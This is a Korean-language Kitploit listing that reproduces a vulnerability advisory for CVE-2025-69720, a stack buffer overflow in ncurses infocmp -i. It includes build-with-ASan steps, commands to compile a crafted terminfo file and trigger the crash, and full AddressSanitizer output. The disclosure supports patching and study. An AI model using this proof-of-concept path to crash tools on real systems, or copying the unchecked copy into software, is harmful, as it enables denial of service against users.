Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-69720 — Advisory for CVE-2025-69720: stack-based buffer overflow in GNU ncurses infocmp (CWE-121) | Kitploit
도구/GitHubGitHub/cao-wuhui/cve-2025-69720
Static AnalysisVulnerability AnalysisExploitationFuzzingBinary AnalysisLearning & Education
GitHubcao-wuhui/cve-2025-69720

CVE-2025-69720

Advisory for CVE-2025-69720: stack-based buffer overflow in GNU ncurses infocmp (CWE-121)

저장소 보기
25개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
웹사이트

CVE-2025-69720: ncurses infocmp -i 스택 버퍼 오버플로우 (CWE-121)

제보자: Yixuan Cao (Shenzhen University), [email protected]

환경

  • 호스트: openEuler 22.03 LTS (Linux aarch64)
  • 도구 체인: 시스템 clang 12.0.1 + AddressSanitizer
  • 소스: ncurses-6.4 및 ncurses-6.5 (패치 20251213 이전)

요약

infocmp -i는 analyze_string() (progs/infocmp.c)을 호출하여 terminfo 항목에서 발견된 CSI 시퀀스를 검사합니다. 이 루틴은 후보 부분 문자열을 고정 크기 스택 버퍼(buf2, 4096바이트)로 복사합니다. len = strlen(cp)가 4096에 대해 검사되지 않기 때문에, 악의적으로 긴 CSI 매개변수 목록(예: sgr=\E[1234567;…;m, 약 800개 매개변수)이 buf2를 오버플로우하여 스택 스매시를 유발합니다. 동일한 PoC가 6.4 및 20251213 패치 이전의 6.5에서도 재현됩니다(아래 ASan 출력 참조). 6.4 이전 버전은 테스트되지 않았습니다.

ncurses 뉴스 (2025/12/13)에서 버그를 확인하고 수정했으며, 공식 패치를 사용할 수 있습니다.

영향

  • 조작된 terminfo 항목에 대해 infocmp -i를 실행하면 도구가 충돌(스택 버퍼 오버플로우)할 수 있습니다. 즉, 해당 호출에 대한 로컬 서비스 거부가 발생합니다.
  • 오버플로우는 progs/infocmp.c (analyze_string)에서 len = strlen(cp)가 len을 검사하지 않고 buf2[MAX_TERMINFO_LENGTH] (4096)에 복사하는 데 사용되고, 이후 buf2[len] = '\0'이 수행될 때 발생합니다.
  • -i 옵션은 init/reset 관련 기능(is1/is2/is3/rs1/rs2/rs3/smcup/rmcup/smkx/rmkx)을 위한 특수 분석 경로이며, -i 없이 일반적인 infocmp 사용에는 영향을 미치지 않습니다.
  • 수정됨: ncurses 6.5, 패치 20251213 (ncurses-6.5-20251213.patch.gz).

재현 단계 (ncurses-6.4를 예로 들어)

  1. ASan을 사용하여 ncurses-6.4의 소스 코드를 준비하고 컴파일합니다.
    root@kitploit:~
    # Download and extract the source code of ncurses-6.4
    # (assume it lives in ~/ncurses-6.4, i.e., /home/<user>/ncurses-6.4)
    cd ~
    wget https://invisible-mirror.net/archives/ncurses/ncurses-6.4.tar.gz
    tar xvf ncurses-6.4.tar.gz
    cd ncurses-6.4
    
    # Configure with ASan
    CC=clang \
    CFLAGS='-O1 -g -fsanitize=address' \
    LDFLAGS='-fsanitize=address' \
    ./configure --enable-widec   # keep wide-char support so the long SGR survives
    
    # Compile infocmp/tic/etc.
    make -j$(nproc)
    
  2. PoC terminfo 소스(파일이 ~/evil_sgr.ti에 있다고 가정)를 임시 데이터베이스로 컴파일합니다.
    root@kitploit:~
    ~/ncurses-6.4/progs/tic -x -o /tmp/evilti ~/evil_sgr.ti
    
  3. ASan이 활성화된 infocmp로 오버플로우를 트리거합니다.
    root@kitploit:~
    TERMINFO=/tmp/evilti ~/ncurses-6.4/progs/infocmp -i evil_sgr
    
    (6.5의 경우 해당 ~/ncurses-6.5/progs/... 경로를 사용하십시오.)

ASan 출력

ncurses-6.4의 경우:

root@kitploit:~
[yixuan@Taishan200 ~]$ TERMINFO=/tmp/evilti ~/ncurses-6.4/progs/infocmp -i evil_sgr
=================================================================
==3848299==ERROR: AddressSanitizer: stack-buffer-overflow on address 0xffffcfa5e240 at pc 0x000000443344 bp 0xffffcfa5c9b0 sp 0xffffcfa5ca08
WRITE of size 6402 at 0xffffcfa5e240 thread T0
    #0 0x443340 in strncpy (/home/yixuan/ncurses-6.4/progs/infocmp+0x443340)
    #1 0x4eee78 in analyze_string /home/yixuan/ncurses-6.4/progs/../progs/infocmp.c:850:3
    #2 0x4ecebc in main /home/yixuan/ncurses-6.4/progs/../progs/infocmp.c:1881:6
    #3 0xffffab9d0ffc  (/usr/lib64/libc.so.6+0x2affc)
    #4 0xffffab9d10d4 in __libc_start_main (/usr/lib64/libc.so.6+0x2b0d4)
    #5 0x42936c in _start (/home/yixuan/ncurses-6.4/progs/infocmp+0x42936c)

Address 0xffffcfa5e240 is located in stack of thread T0 at offset 4128 in frame
    #0 0x4eebe0 in analyze_string /home/yixuan/ncurses-6.4/progs/../progs/infocmp.c:818

  This frame has 2 object(s):
    [32, 4128) 'buf2' (line 819)
    [4256, 8352) 'buf3' (line 834) <== Memory access at offset 4128 partially underflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
      (longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow (/home/yixuan/ncurses-6.4/progs/infocmp+0x443340) in strncpy
Shadow bytes around the buggy address:
  0x200ff9f4bbf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x200ff9f4bc00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x200ff9f4bc10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x200ff9f4bc20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x200ff9f4bc30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x200ff9f4bc40: 00 00 00 00 00 00 00 00[f2]f2 f2 f2 f2 f2 f2 f2
  0x200ff9f4bc50: f2 f2 f2 f2 f2 f2 f2 f2 00 00 00 00 00 00 00 00
  0x200ff9f4bc60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x200ff9f4bc70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x200ff9f4bc80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x200ff9f4bc90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==3848299==ABORTING

그리고 ncurses-6.5의 경우:

root@kitploit:~
[yixuan@Taishan200 ~]$  TERMINFO=/tmp/evilti ~/ncurses-6.5/progs/infocmp -i evil_sgr
=================================================================
==3863888==ERROR: AddressSanitizer: stack-buffer-overflow on address 0xfffff7af5380 at pc 0x000000443544 bp 0xfffff7af3af0 sp 0xfffff7af3b48
WRITE of size 6402 at 0xfffff7af5380 thread T0
    #0 0x443540 in strncpy (/home/yixuan/ncurses-6.5/progs/infocmp+0x443540)
    #1 0x4ef094 in analyze_string /home/yixuan/ncurses-6.5/progs/../progs/infocmp.c:874:3
    #2 0x4ed0d8 in main /home/yixuan/ncurses-6.5/progs/../progs/infocmp.c:1913:6
    #3 0xffff811baffc  (/usr/lib64/libc.so.6+0x2affc)
    #4 0xffff811bb0d4 in __libc_start_main (/usr/lib64/libc.so.6+0x2b0d4)
    #5 0x42956c in _start (/home/yixuan/ncurses-6.5/progs/infocmp+0x42956c)

Address 0xfffff7af5380 is located in stack of thread T0 at offset 4128 in frame
    #0 0x4eedfc in analyze_string /home/yixuan/ncurses-6.5/progs/../progs/infocmp.c:842

  This frame has 2 object(s):
    [32, 4128) 'buf2' (line 843)
    [4256, 8352) 'buf3' (line 858) <== Memory access at offset 4128 partially underflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
      (longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow (/home/yixuan/ncurses-6.5/progs/infocmp+0x443540) in strncpy
Shadow bytes around the buggy address:
  0x200ffef5ea20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x200ffef5ea30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x200ffef5ea40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x200ffef5ea50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x200ffef5ea60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x200ffef5ea70:[f2]f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
  0x200ffef5ea80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x200ffef5ea90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x200ffef5eaa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x200ffef5eab0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x200ffef5eac0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==3863888==ABORTING
도구 다운로드